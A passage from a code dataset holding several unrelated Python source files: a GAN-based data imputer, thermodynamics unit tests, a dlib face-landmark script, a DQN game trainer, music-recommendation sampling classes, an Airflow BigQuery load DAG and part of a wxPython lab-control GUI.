input_dim),\r\n # Note: performed better without Tanh activation\r\n nn.Sigmoid()\r\n )\r\n\r\n def forward(self, input, m):\r\n # Note: noise or without noise\r\n hidden = self.main(input * m)\r\n return input * m + (1 - m) * hidden\r\n\r\ndef calc_gradient_penalty(netD, real_data, fake_data, batch_size,use_cuda,lambda_):\r\n alpha = torch.rand(batch_size, 1)\r\n alpha = alpha.expand(real_data.size())\r\n alpha = alpha.cuda() if use_cuda else alpha\r\n\r\n interpolates = alpha * real_data + ((1 - alpha) * fake_data)\r\n\r\n if use_cuda:\r\n interpolates = interpolates.cuda()\r\n interpolates = Variable(interpolates, requires_grad=True)\r\n\r\n disc_interpolates = netD(interpolates)\r\n\r\n gradients = grad(outputs=disc_interpolates, inputs=interpolates,\r\n grad_outputs=torch.ones(disc_interpolates.size()).cuda() if use_cuda else torch.ones(\r\n disc_interpolates.size()),\r\n create_graph=True, retain_graph=True, only_inputs=True)[0]\r\n\r\n gradient_penalty = ((gradients.norm(2, dim=1) - 1)\r\n ** 2).mean() * lambda_\r\n return gradient_penalty\r\n\r\ndef weights_init(m):\r\n classname = m.__class__.__name__\r\n if classname.find('Conv') != -1:\r\n m.weight.data.normal_(0.0, 0.02)\r\n elif classname.find('BatchNorm') != -1:\r\n m.weight.data.normal_(1.0, 0.02)\r\n m.bias.data.fill_(0)\r\n\r\n\r\nfrom sklearn.metrics import mean_squared_error\r\n\r\n\r\ndef cal_loss_MSER(imputer, data_loader):\r\n imputed_data_mask = []\r\n origin_data_mask = []\r\n loss = []\r\n for real_data, real_mask, origin_data, _ in data_loader:\r\n origin_data = origin_data.float().to(device)\r\n real_mask = real_mask.float().to(device)\r\n imputed_data = imputer(origin_data, real_mask)\r\n\r\n imputed_data = imputed_data.detach().cpu().numpy()\r\n origin_data = origin_data.detach().cpu().numpy()\r\n masks = real_mask.detach().cpu().numpy()\r\n\r\n imputed_data_mask.extend(imputed_data * (1 - masks))\r\n origin_data_mask.extend(origin_data * (1 - masks))\r\n\r\n return imputed_data_mask, origin_data_mask\r\n\r\n\r\ndef train(data,batch_size,epochs,n_iter_d,n_iter_g,beta1,beta2,lr,lambda_):\r\n # batch_size = cf.batch_size\r\n data_loader = DataLoader(data, batch_size=batch_size, shuffle=True,\r\n drop_last=True)\r\n\r\n # lambda_ = 10\r\n # lr = 5e-4\r\n # beta1 = 0.0001\r\n # beta2 = 0.999\r\n # n_iter_d = 2\r\n # n_iter_g = 1\r\n # n_iter = cf.n_iter\r\n\r\n netG_imp = Generator_Imputer(data.n_labels)\r\n netG_imp.apply(weights_init)\r\n\r\n netD_imp = Discriminator(data.n_labels)\r\n netD_imp.apply(weights_init)\r\n\r\n if use_cuda:\r\n netG_imp = netG_imp.cuda()\r\n netD_imp = netD_imp.cuda()\r\n optimizerG_imp = optim.Adam(\r\n netG_imp.parameters(), lr=lr, betas=(beta1, beta2))\r\n # Note: transfer learning with lr/10\r\n optimizerD_imp = optim.Adam(\r\n netD_imp.parameters(), lr=lr, betas=(beta1, beta2))\r\n\r\n\r\n for _ in range(epochs):\r\n # for iter in range(5):\r\n # print(iter)\r\n # data.suff()\r\n # data_loader = DataLoader(data, batch_size=batch_size, shuffle=True,\r\n # drop_last=True)\r\n for _, real_mask, real_data, _ in data_loader:\r\n for _ in range(n_iter_d):\r\n # for real_data, real_mask, origin_data, _ in data_loader:\r\n # real_data, real_mask, origin_data, _ = next(iter(data_loader))\r\n netG_imp.zero_grad()\r\n netD_imp.zero_grad()\r\n if use_cuda:\r\n real_data, real_mask = real_data.float().cuda(), real_mask.float().cuda()\r\n\r\n fake_imp = netG_imp(real_data, real_mask).detach()\r\n real_imp = real_data.detach()\r\n else:\r\n real_data, real_mask = real_data.float(), real_mask.float()\r\n\r\n fake_imp = netG_imp(real_data, real_mask)\r\n real_imp = real_data\r\n # train with real\r\n D_real_imp = netD_imp(real_data)\r\n D_real_imp = D_real_imp.mean()\r\n\r\n # train with fake\r\n D_fake_imp = netD_imp(fake_imp)\r\n D_fake_imp = D_fake_imp.mean()\r\n\r\n gradient_penalty = calc_gradient_penalty(\r\n netD_imp, real_imp, fake_imp, batch_size,use_cuda,lambda_)\r\n D_imp_cost = D_fake_imp - D_real_imp + gradient_penalty\r\n dist = D_real_imp - D_fake_imp\r\n D_imp_cost.backward()\r\n optimizerD_imp.step()\r\n\r\n ############################\r\n # (2) Update G_imp network\r\n ############################\r\n\r\n # for real_data, real_mask, origin_data, _ in data_loader:\r\n for _ in range(n_iter_g):\r\n # real_data, real_mask, origin_data, _ = next(iter(data_loader))\r\n\r\n netG_imp.zero_grad()\r\n netD_imp.zero_grad()\r\n\r\n if use_cuda:\r\n real_data, real_mask = real_data.float().cuda(), real_mask.float().cuda()\r\n else:\r\n real_data, real_mask = real_data.float(), real_mask.float()\r\n fake_imp = netG_imp(real_data, real_mask)\r\n\r\n G_imp_cost = netD_imp(fake_imp)\r\n # G_imp_cost = -G_imp_cost.mean()* 0.0 + 1.0 * torch.sqrt(torch.sum((real_data-fake_imp)**2))\r\n G_imp_cost = -G_imp_cost.mean()\r\n G_imp_cost.backward()\r\n optimizerG_imp.step()\r\n return netG_imp,netD_imp","sub_path":"misgan_dd/model_dd.py","file_name":"model_dd.py","file_ext":"py","file_size_in_byte":7899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"190091358","text":"import unittest\nfrom numpy import max, abs, ones, zeros\nfrom spitfire.configured.options import get_configuration_option\nfrom cantera import Solution, gas_constant\nfrom spitfire.griffon.griffon import PyCombustionKernels as Griffon\nfrom os.path import join\nfrom subprocess import getoutput\n\ntest_mech_directory = join(get_configuration_option('spitfire_path'), 'test', 'griffon', 'test-mechanisms')\nmechs = [x.replace('.xml', '') for x in getoutput('ls ' + test_mech_directory + ' | grep .xml').split('\\n')]\n\ntolerance = 1.e-12\n\n\ndef do_mmw(griffon, gas, T, p, y):\n gas.TPY = T, p, y\n ct = gas.mean_molecular_weight\n gr = griffon.mixture_molecular_weight(y)\n return abs(gr - ct) / abs(gr) < tolerance\n\n\ndef do_density(griffon, gas, T, p, y):\n gas.TPY = T, p, y\n ct = gas.density_mass\n gr = griffon.ideal_gas_density(p, T, y)\n return abs(gr - ct) / abs(gr) < tolerance\n\n\ndef do_pressure(griffon, gas, T, p, y):\n gas.TPY = T, p, y\n rho = gas.density_mass\n gr = griffon.ideal_gas_pressure(rho, T, y)\n return abs(gr - p) / abs(gr) < tolerance\n\n\ndef do_cpmix(griffon, gas, T, p, y):\n gas.TPY = T, p, y\n ct = gas.cp_mass\n gr = griffon.cp_mix(T, y)\n return abs(gr - ct) / abs(gr) < tolerance\n\n\ndef do_cvmix(griffon, gas, T, p, y):\n gas.TPY = T, p, y\n ct = gas.cv_mass\n gr = griffon.cv_mix(T, y)\n return abs(gr - ct) / abs(gr) < tolerance\n\n\ndef do_cpspec(griffon, gas, T, p, y):\n gas.TPY = T, p, y\n ct = gas.standard_cp_R * gas_constant / gas.molecular_weights\n gr = zeros(gas.n_species)\n griffon.species_cp(T, gr)\n return max(abs(gr - ct) / abs(gr)) < tolerance\n\n\ndef do_cvspec(griffon, gas, T, p, y):\n gas.TPY = T, p, y\n ct = gas.standard_cp_R * gas_constant / gas.molecular_weights - gas_constant / gas.molecular_weights\n gr = zeros(gas.n_species)\n griffon.species_cv(T, gr)\n return max(abs(gr - ct) / abs(gr)) < tolerance\n\n\ndef do_hmix(griffon, gas, T, p, y):\n gas.TPY = T, p, y\n ct = gas.enthalpy_mass\n gr = griffon.enthalpy_mix(T, y)\n return abs(abs(gr - ct) / abs(gr)) < tolerance\n\n\ndef do_emix(griffon, gas, T, p, y):\n gas.TPY = T, p, y\n ct = gas.int_energy_mass\n gr = griffon.energy_mix(T, y)\n return abs(abs(gr - ct) / abs(gr)) < tolerance\n\n\ndef do_hspec(griffon, gas, T, p, y):\n gas.TPY = T, p, y\n ct = gas.standard_enthalpies_RT * gas.T * gas_constant / gas.molecular_weights\n gr = zeros(gas.n_species)\n griffon.species_enthalpies(T, gr)\n return max(abs(gr - ct) / abs(gr)) < tolerance\n\n\ndef do_espec(griffon, gas, T, p, y):\n gas.TPY = T, p, y\n ct = gas.standard_int_energies_RT * gas.T * gas_constant / gas.molecular_weights\n gr = zeros(gas.n_species)\n griffon.species_energies(T, gr)\n return max(abs(gr - ct) / abs(gr)) < tolerance\n\n\nquantity_test_dict = {'mixture molecular weight': do_mmw,\n 'density': do_density,\n 'pressure': do_pressure,\n 'cp mix': do_cpmix,\n 'cv mix': do_cvmix,\n 'cp species': do_cpspec,\n 'cv species': do_cvspec,\n 'enthalpy mix': do_hmix,\n 'energy mix': do_emix,\n 'enthalpy species': do_hspec,\n 'energy species': do_espec}\n\n\ndef validate_on_mechanism(mech, temperature, quantity):\n xml = join(test_mech_directory, mech + '.xml')\n\n r = Griffon(xml, 'gas')\n gas = Solution(xml)\n\n T = temperature\n p = 101325.\n gas.TPY = T, p, ones(gas.n_species)\n y = gas.Y\n\n return quantity_test_dict[quantity](r, gas, T, p, y)\n\n\ndef create_test(m, T, quantity):\n def test(self):\n self.assertTrue(validate_on_mechanism(m, T, quantity))\n\n return test\n\n\nclass Accuracy(unittest.TestCase):\n pass\n\n\nif get_configuration_option('test_griffon') == 'True':\n temperature_dict = {'low': 300., 'high': 1200.}\n for mech in mechs:\n for quantity in quantity_test_dict.keys():\n for temperature in temperature_dict:\n testname = 'test_' + quantity.replace(' ', '-') + '_' + mech + '_' + temperature + 'T'\n setattr(Accuracy, testname, create_test(mech, temperature_dict[temperature], quantity))\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/griffon/test_thermodynamics.py","file_name":"test_thermodynamics.py","file_ext":"py","file_size_in_byte":4285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"287109919","text":"# -*- coding: utf-8 -*-\n# @Time : 18-5-25 下午7:38\n# @Author : payneLi\n# @Email : lph0729@163.com\n# @File : dlib_getFAce.py\n\nimport cv2\nimport dlib\nfrom matplotlib import pyplot as plt\n\n# image_path = \"../OpenCv/AJ_Cook/AJ_Cook_0001.jpg\"\nimage_path = \"./payneLi.jpg\"\nlandmark_path = \"./dlib_aligin/shape_predictor_68_face_landmarks.dat\"\n\n\"\"\"加载人脸对准模型\"\"\"\nface_detector = dlib.get_frontal_face_detector() # 实例化一个特征提取器\nlandmark_predictor = dlib.shape_predictor(landmark_path) # 特征点检测器\n\n\ndef get_face():\n \"\"\"根据人脸框bbox, 从一张完整图片裁出一张人脸\"\"\"\n image_bgr = cv2.imread(image_path)\n if image_bgr is None:\n return False\n image_rgb = cv2.cvtColor(image_bgr, cv2.COLOR_BGR2RGB)\n face_react = face_detector(image_rgb, 1) # 传递的参数不太懂\n print(\"------face_react---------\", face_react)\n if len(face_react) <= 0:\n return False\n\n for k, d in enumerate(face_react):\n shape = landmark_predictor(image_rgb, d) # 返回的结果是一个对象\n for i in range(68):\n pt = shape.part(i)\n plt.plot(pt.x, pt.y, \"ro\")\n plt.imshow(image_rgb)\n plt.show()\n\n\nget_face()\n","sub_path":"AI/Dlib/dlib_getFAce.py","file_name":"dlib_getFAce.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"497198825","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\ntrain part\n\n\"\"\"\n\n\nimport numpy as np\nfrom collections import deque\n\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Flatten\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\n#from keras.optimizers import Adam\nfrom numpy import random\nimport matplotlib.pyplot as plt\nimport pickle\nimport os\n#import tensorflow as tf\n\nfrom game_api2 import jump_API\n\nimg_rows = 100\nimg_cols = 100\nimg_channels = 1\nACTIONS = 15 # how many actions can be taken\nMIN_MS = 300 # the minimum steps (press time in old API)\nMAX_MS = 1200\nOBSERVATION = 100 # how many observations before start to train\nINITIAL_EPSILON = 0.15\nFINAL_EPSILON = 0.0001\nEXPLORE = 1000 # how many steps from INITIAL_EPSILON to FINAL_EPSILON\nREPLAY_MEMORY = 2000 # number of states to remember\nBATCH = 500 # size of minibatch\nGAMMA = 0.05 # the decay rate\nMONITOR = True # whether to show the images\nMASK = False # use the masked image to train\n\ndef buildmodel(show_model=False):\n model = Sequential()\n model.add(Conv2D(8,(5,5),activation='relu',input_shape=(img_rows,img_cols,img_channels)))\n model.add(MaxPooling2D((4,4)))\n model.add(Conv2D(16,(3,3),activation='relu'))\n model.add(MaxPooling2D((4,4)))\n model.add(Flatten())\n model.add(Dense(32))\n model.add(Dropout(0.4))\n model.add(Dense(ACTIONS))\n model.compile(loss='mse',optimizer='adam')\n if show_model: print(model.summary())\n return model\n\n\n\n\n####### if you run at the first time:\nif not os.path.exists('mem.pickle'):\n model = buildmodel(True)\n mem = deque(maxlen = REPLAY_MEMORY) # store the memories\n epsilon = INITIAL_EPSILON\n t=0\nelse:####### if you continue to run:\n with open('mem.pickle','rb') as f:\n (t,epsilon,mem)=pickle.load(f)\n from keras.models import load_model\n model = load_model('model.h5')\n##################################\n\ng = jump_API(MIN_MS,MAX_MS,ACTIONS,MASK) #initialize an API to the game\ns_t = g.first_step()\n\nwhile True: # start to loop\n print('*********************************')\n print('t=%i,epsilon=%f'%(t,epsilon),end=' ')\n if random.random()<=epsilon:\n print('RANDOM MOVE!')\n a_t = random.choice(ACTIONS)\n else:\n print('Move by model.')\n qs = model.predict(s_t)\n a_t = np.argmax(qs)\n # forward one step\n print('Moving...',end=' ')\n s_t1, r_t, die = g.next_step(a_t)\n print('Done.')\n \n # save it to memory\n print('=========')\n print('NEW Memory: \\na_t=%i,r_t=%i,die=%i'%(a_t,r_t,die))\n if die:\n mem.append((s_t,a_t, r_t,None,die))\n if MONITOR: plt.imshow(s_t[0,:,:,0],'gray')\n if MONITOR: plt.show()\n print('Then DIE.')\n else:\n mem.append((s_t,a_t, r_t,s_t1,die))\n if MONITOR: plt.imshow(np.concatenate((s_t,s_t1),axis=2)[0,:,:,0],'gray')\n if MONITOR: plt.show()\n print('=========')\n # update epsilon\n if epsilon > FINAL_EPSILON and t > OBSERVATION:\n epsilon -= (INITIAL_EPSILON - FINAL_EPSILON) / EXPLORE\n if epsilon < FINAL_EPSILON: epsilon = FINAL_EPSILON\n # trian the model if observations are enough\n if t > OBSERVATION:\n # sample a minibatch\n minibatch = random.choice(len(mem), min(BATCH,len(mem)))\n # initialize input and target\n inputs = np.zeros((BATCH, img_rows, img_cols, img_channels))\n targets = np.zeros((BATCH, ACTIONS))\n # fill them\n for i,j in enumerate(minibatch):\n (s0_t,a0_t, r0_t,s0_t1,die0) = mem[j]\n inputs[i:i+1] = s0_t\n if die0:\n targets[i] = model.predict(s0_t)\n targets[i,a0_t] = r0_t # if die, no future rewards\n else:\n # if not die, other distances should be worse\n targets[i] = np.zeros((1,ACTIONS))\n Qt1 = model.predict(s0_t1)\n maxQ = np.max(Qt1)\n targets[i,a0_t] = r0_t + GAMMA * maxQ\n # train the model\n print('Training the model...',end=' ')\n loss = model.train_on_batch(inputs,targets)\n print('Done. loss=%f'%loss)\n # iteration\n s_t = s_t1\n t += 1\n # save the model every 10 times\n if t%50 ==0:\n print('saving model...',end=' ')\n model.save('model.h5')\n with open('mem.pickle','wb') as f:\n pickle.dump((t,epsilon,mem),f)\n print('Done.')\n \n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"641157735","text":"import numpy as np\r\nfrom pandas import qcut, read_csv\r\nfrom scipy import sparse\r\nfrom sklearn.metrics.pairwise import euclidean_distances\r\nfrom sklearn.preprocessing import normalize\r\nfrom tqdm import tqdm\r\n\r\n\r\ndef calc_distance_matrix(dataset=None):\r\n music_content_feature = ['instrumentalness', 'liveness', 'speechiness', 'danceability',\r\n 'valence', 'loudness', 'tempo', 'acousticness', 'energy', 'mode']\r\n if dataset == 'nowplaying-rs':\r\n cleaned_df = read_csv('../../nowplaying-RS-Music-Reco-FM/nowplaying_cleaned.csv', index_col=0)\r\n track_contents = cleaned_df.drop_duplicates(subset=['track_id'])[music_content_feature]\r\n\r\n elif dataset == 'mmtd':\r\n songs_df = read_csv('../../mmtd/mmtd_nowplaying.csv', index_col=0)\r\n track_contents = songs_df.drop_duplicates(subset=['spotify_id'])[music_content_feature]\r\n\r\n track_contents_norm = normalize(track_contents, axis=0)\r\n return euclidean_distances(track_contents_norm)\r\n\r\n\r\nclass UserOrientedLEsSampling:\r\n def __init__(self, k, sampling_size=None):\r\n self.k = 1 if k < 1 else k\r\n self.item_size = sampling_size\r\n\r\n def generate_record(self, item_id=None):\r\n record = np.random.randint(0, self.item_size, self.k)\r\n while item_id in record:\r\n record = np.random.randint(0, self.item_size, self.k)\r\n return record\r\n\r\n\r\n# content-based cosine similarity\r\nclass WeightedUserOrientedLEsSampling(UserOrientedLEsSampling):\r\n def __init__(self, k, dataset):\r\n distance_matrix = calc_distance_matrix(dataset)\r\n UserOrientedLEsSampling.__init__(self, k=k, sampling_size=distance_matrix.shape[0])\r\n self.weight_mat = distance_matrix / distance_matrix.sum(axis=1).reshape(self.item_size, 1)\r\n del distance_matrix\r\n\r\n def generate_record(self, item_id=None):\r\n # weight = distance_matrix[item_id] / np.sum(distance_matrix[item_id])\r\n return np.random.choice(self.item_size, self.k, p=self.weight_mat[item_id])\r\n\r\n\r\n# Popularity\r\nclass PopularitySampling(UserOrientedLEsSampling):\r\n def __init__(self, k, track=None, score_lim=10):\r\n UserOrientedLEsSampling.__init__(self, k=k, sampling_size=len(track.unique()))\r\n played_count = track.value_counts(sort=False)\r\n played_ctgr = qcut(played_count, q=score_lim, labels=range(score_lim, 0, -1))\r\n self.score = played_ctgr.tolist() / np.sum(played_ctgr.tolist())\r\n\r\n def generate_record(self, item_id=None):\r\n record = np.random.randint(0, self.item_size, self.k)\r\n while item_id in record:\r\n record = np.random.choice(self.item_size, self.k, p=self.score)\r\n return record\r\n\r\n\r\n# context-based sampling\r\nclass ContextSampling(UserOrientedLEsSampling):\r\n def __init__(self, k, dataset=None, context_list=None, score_lim=5):\r\n UserOrientedLEsSampling.__init__(self, k=k, sampling_size=None)\r\n\r\n self.track_count_list = list()\r\n self.score_list = list()\r\n self.context_value_com = dataset[context_list].drop_duplicates().values.tolist()\r\n for context_value in tqdm(self.context_value_com):\r\n dataset_copy = dataset.copy()\r\n\r\n for l, v in zip(context_list, context_value):\r\n dataset_copy = dataset_copy[dataset_copy[l] != v]\r\n track_count = dataset_copy['track_id'].value_counts()\r\n self.track_count_list.append(track_count)\r\n self.score_list.append(track_count.tolist() / np.sum(track_count.tolist()))\r\n\r\n # track_ctgr = qcut(track_count, q=score_lim, labels=range(1, score_lim+1))\r\n # self.score_list.append(track_ctgr.tolist() / np.sum(track_ctgr.tolist()))\r\n\r\n def generate_record(self, item_id=None, context_value=None):\r\n i = self.context_value_com.index(context_value)\r\n record = np.random.choice(len(self.track_count_list[i]), self.k, p=self.score_list[i])\r\n return self.track_count_list[i].index[record][0]\r\n\r\n# cs = ContextSampling(k=1, dataset=mmtd, context_list=['lang', 'dayofyear', 'period_of_day'])\r\n# cs.generate_record()","sub_path":"negative_sampling/sampling.py","file_name":"sampling.py","file_ext":"py","file_size_in_byte":4113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"638748669","text":"from __future__ import print_function\n\nimport logging\nimport os\nfrom datetime import datetime, timedelta\n\nfrom airflow import models\nfrom airflow.contrib.operators.bigquery_operator import BigQueryOperator\nfrom airflow.contrib.sensors.gcs_sensor import GoogleCloudStorageObjectSensor\nfrom airflow.operators.email_operator import EmailOperator\nfrom airflow.operators.python_operator import PythonOperator\nfrom google.cloud import bigquery\nfrom google.cloud.bigquery import TimePartitioning\n\nfrom ethereum2etl_airflow.bigquery_utils import submit_bigquery_job, create_dataset, read_bigquery_schema_from_file\nfrom ethereum2etl_airflow.file_utils import read_file\n\nlogging.basicConfig()\nlogging.getLogger().setLevel(logging.DEBUG)\n\n\ndef build_load_dag(\n dag_id,\n output_bucket,\n destination_dataset_project_id,\n chain='ethereum2',\n notification_emails=None,\n load_start_date=datetime(2018, 8, 4),\n load_end_date=None,\n load_schedule_interval='0 0 * * *'\n):\n \"\"\"Build Load DAG\"\"\"\n\n dataset_name = f'crypto_{chain}'\n\n if not destination_dataset_project_id:\n raise ValueError('destination_dataset_project_id is required')\n\n default_dag_args = {\n 'depends_on_past': False,\n 'start_date': load_start_date,\n 'end_date': load_end_date,\n 'email_on_failure': True,\n 'email_on_retry': True,\n 'retries': 5,\n 'retry_delay': timedelta(minutes=5)\n }\n\n if notification_emails and len(notification_emails) > 0:\n default_dag_args['email'] = [email.strip() for email in notification_emails.split(',')]\n\n environment = {\n 'dataset_name': dataset_name,\n 'destination_dataset_project_id': destination_dataset_project_id,\n }\n\n # Define a DAG (directed acyclic graph) of tasks.\n dag = models.DAG(\n dag_id,\n catchup=False if load_end_date is None else True,\n schedule_interval=load_schedule_interval,\n default_args=default_dag_args)\n\n dags_folder = os.environ.get('DAGS_FOLDER', '/home/airflow/gcs/dags')\n\n def add_load_tasks(task, time_partitioning_field='block_timestamp', only_last_date=False):\n wait_sensor = GoogleCloudStorageObjectSensor(\n task_id='wait_latest_{task}'.format(task=task),\n timeout=60 * 60,\n poke_interval=60,\n bucket=output_bucket,\n object='export/{task}/block_date={datestamp}/{task}.json'.format(task=task, datestamp='{{ds}}'),\n dag=dag\n )\n\n def load_task(ds, **kwargs):\n client = bigquery.Client()\n job_config = bigquery.LoadJobConfig()\n schema_path = os.path.join(dags_folder, 'ethereum2etl_resources/stages/load/schemas/{task}.json'.format(task=task))\n job_config.schema = read_bigquery_schema_from_file(schema_path)\n job_config.source_format = bigquery.SourceFormat.NEWLINE_DELIMITED_JSON\n job_config.write_disposition = 'WRITE_TRUNCATE'\n job_config.ignore_unknown_values = True\n if time_partitioning_field is not None:\n job_config.time_partitioning = TimePartitioning(field=time_partitioning_field)\n\n export_location_uri = 'gs://{bucket}/export'.format(bucket=output_bucket)\n if only_last_date:\n uri = '{export_location_uri}/{task}/block_date={ds}/*.json'.format(\n export_location_uri=export_location_uri, task=task, ds=ds)\n else:\n uri = '{export_location_uri}/{task}/*.json'.format(export_location_uri=export_location_uri, task=task)\n table_ref = create_dataset(client, dataset_name, destination_dataset_project_id).table(task)\n load_job = client.load_table_from_uri(uri, table_ref, job_config=job_config)\n submit_bigquery_job(load_job, job_config)\n assert load_job.state == 'DONE'\n\n load_operator = PythonOperator(\n task_id='load_{task}'.format(task=task),\n python_callable=load_task,\n provide_context=True,\n execution_timeout=timedelta(minutes=30),\n dag=dag\n )\n\n wait_sensor >> load_operator\n return load_operator\n\n def add_verify_tasks(task, dependencies=None):\n # The queries in verify/sqls will fail when the condition is not met\n # Have to use this trick since the Python 2 version of BigQueryCheckOperator doesn't support standard SQL\n # and legacy SQL can't be used to query partitioned tables.\n sql_path = os.path.join(dags_folder, 'ethereum2etl_resources/stages/verify/sqls/{task}.sql'.format(task=task))\n sql = read_file(sql_path)\n verify_task = BigQueryOperator(\n task_id='verify_{task}'.format(task=task),\n bql=sql,\n params=environment,\n use_legacy_sql=False,\n dag=dag)\n if dependencies is not None and len(dependencies) > 0:\n for dependency in dependencies:\n dependency >> verify_task\n return verify_task\n\n load_beacon_blocks_task = add_load_tasks('beacon_blocks', time_partitioning_field='block_timestamp')\n load_beacon_validators_task = add_load_tasks('beacon_validators', time_partitioning_field=None, only_last_date=True)\n load_beacon_committees_task = add_load_tasks('beacon_committees', time_partitioning_field='epoch_timestamp')\n\n verify_blocks_count_task = add_verify_tasks('blocks_count', dependencies=[load_beacon_blocks_task])\n verify_blocks_have_latest_task = add_verify_tasks('blocks_have_latest', dependencies=[load_beacon_blocks_task])\n verify_committees_count_task = add_verify_tasks('committees_count', dependencies=[load_beacon_committees_task])\n\n if notification_emails and len(notification_emails) > 0:\n send_email_task = EmailOperator(\n task_id='send_email',\n to=[email.strip() for email in notification_emails.split(',')],\n subject='Ethereum2 ETL Airflow Load DAG Succeeded',\n html_content='Ethereum2 ETL Airflow Load DAG Succeeded - {}'.format(chain),\n dag=dag\n )\n verify_blocks_count_task >> send_email_task\n verify_blocks_have_latest_task >> send_email_task\n verify_committees_count_task >> send_email_task\n\n return dag\n","sub_path":"dags/ethereum2etl_airflow/build_load_dag.py","file_name":"build_load_dag.py","file_ext":"py","file_size_in_byte":6311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"533663431","text":"########################################################################\n#\n#\tWrapper for ODD discrimination algorithm build on DEAP library (http://deap.readthedocs.org/en/latest/api/algo.html)\n#\n########################################################################\n# Add main directory to enable imports \nif __name__ == '__main__' :\n\timport os\n\tos.sys.path.append(os.path.abspath('../..'))\n########################################################################\n\nimport wx\n\n# Real time plotting\nimport visvis\n\n# GUI components\nfrom libs.gui.basic_window import BasicWindow\n\nfrom ga_tab import GA_Tab\n\n# Hardware\nfrom libs.dev.spectrometer_ocean_optics import ManagerOceanOpticsSpectrometer as ManagerSpectrometer\nfrom libs.dev.spectrometer_ocean_optics import OceanOpticsSpectrometerTab as SpectrometerTab\n#from libs.dev.camera_istar import ManagerIStarCamera as ManagerSpectrometer\n#from libs.dev.camera_istar import IStarCameraTab as SpectrometerTab\n\nfrom libs.dev.pulse_shaper import ManagerShaper, PulseShaperTab\n\n########################################################################\n\nclass SettingsNotebook (wx.Notebook) :\n\t\"\"\"\n\tGUI for listing all settings\n\t\"\"\"\n\tdef __init__(self, parent, DevSpectrometer, DevPulseShaper ):\n\t\t\"\"\"\n\t\t`DevSpectrometer` is a spectrometer manager\n\t\t\"\"\"\n\t\twx.Notebook.__init__(self, parent)\n\t\t\n\t\tself.ODD_GA = GA_Tab(self)\n\t\tself.AddPage(self.ODD_GA, \"ODD GA\")\n\t\t\n\t\tself.Spectrometer = SpectrometerTab(self, DevSpectrometer)\n\t\tself.AddPage (self.Spectrometer, \"Spectrometer\")\n\t\t \n\t\tself.PulseShaper = PulseShaperTab(self, DevPulseShaper)\n\t\tself.AddPage (self.PulseShaper, \"Pulse shaper\")\n\n\t\t# Dictionary to bind names to tabs for saving and loading settings\n\t\tself.settings_to_tabs = {\"Spectrometer\" : self.Spectrometer, \n\t\t\t\"PulseShaper\" : self.PulseShaper, \"ODD_GA\" : self.ODD_GA }\t\t\n\n########################################################################\n\nclass ODDExperiment (BasicWindow) :\n\n\tdef __init__ (self, parent) :\n\t\t# Starting spectrometer\n\t\tself.Spectrometer = ManagerSpectrometer()\n\t\tself.SpectrometerProc = self.Spectrometer.start()\n\t\t\n\t\t# Starting pulse shaper\n\t\tself.PulseShaper = ManagerShaper()\n\t\tself.PulseShaperProc = self.PulseShaper.start()\n\t\t\n\t\t# Create GUI\n\t\tdw, dh = wx.DisplaySize()\n\t\twx.Frame.__init__ (self, parent, title=\"ODD for multiple fluoresce marker concentration measurements\",\n\t\t\t\t\t\t\t\tsize=(0.9*dw, 0.88*dh) )\n\t\t\n\t\tself.ConstructGUI ()\n\t\tself.Center()\n\t\tself.Maximize()\n\t\tself.Show ()\n\t\twx.EVT_CLOSE (self, self.on_close)\n\t\t\n\tdef __del__ (self) :\t\n\t\t# Close spectrometer\n\t\tself.Spectrometer.exit(); self.SpectrometerProc.join() \n\t\t\n\t\t# Close pulse shaper\n\t\tself.PulseShaper.exit(); self.PulseShaperProc.join()\n\t\n\tdef ConstructGUI (self) :\n\t\t\"\"\" Build GUI \"\"\"\n\t\tself.panel = wx.Panel(self)\n\t\tsizer = wx.GridBagSizer ()\n\t\t\n\t\t############################ Settings Notebook ############################\n\t\tself.SettingsNotebook = SettingsNotebook(self.panel, self.Spectrometer, self.PulseShaper)\n\t\tsizer.Add(self.SettingsNotebook, pos=(0, 0), span=(1, 1), flag=wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT , border=10)\n\n\t\t############################ Command panel ############################\n\t\tboxsizer = wx.BoxSizer (wx.VERTICAL)\n\t\t\n\t\t# Interactively display spectrum\n\t\tboxsizer.Add (self.CreateShowSpectrumButton(), flag=wx.EXPAND, border=5)\n\t\t\n\t\t# Separator\n\t\tboxsizer.Add (wx.StaticText(self.panel), flag=wx.EXPAND, border=5)\n\t\n\t\t# Separator\n\t\tboxsizer.Add (wx.StaticText(self.panel), flag=wx.EXPAND, border=5)\n\t\t\n\t\t# Send random phase to the pulse shaper\n\t\tboxsizer.Add (self.CreateRandomPhaseButton(), flag=wx.EXPAND, border=5)\n\t\t# Send random amplitude to the pulse shaper\n\t\tboxsizer.Add (self.CreateRandomAmplitudeButton(), flag=wx.EXPAND, border=5)\n\t\t# Send zero amplitude and zero phase to the pulse shaper\n\t\tboxsizer.Add (self.CreateZeroAmplitudeButton(), flag=wx.EXPAND, border=5)\n\t\t\n\t\t# Open pulse shaper equalizer\n\t\tboxsizer.Add (self.CreatePulseShaperEqualizerButton(), flag=wx.EXPAND, border=5)\n\t\t\n\t\t# Separator\n\t\tboxsizer.Add (wx.StaticText(self.panel), flag=wx.EXPAND, border=5)\n\t\t\n\t\t# Save settings\n\t\tboxsizer.Add( self.CreateSaveSettingsButton(), flag=wx.EXPAND, border=5)\n\t\t# Load settings\n\t\tboxsizer.Add( self.CreateLoadSettingsButton(), flag=wx.EXPAND, border=5)\n\t\t\n\t\tsizer.Add(boxsizer, pos=(1, 0), span=(1, 1), 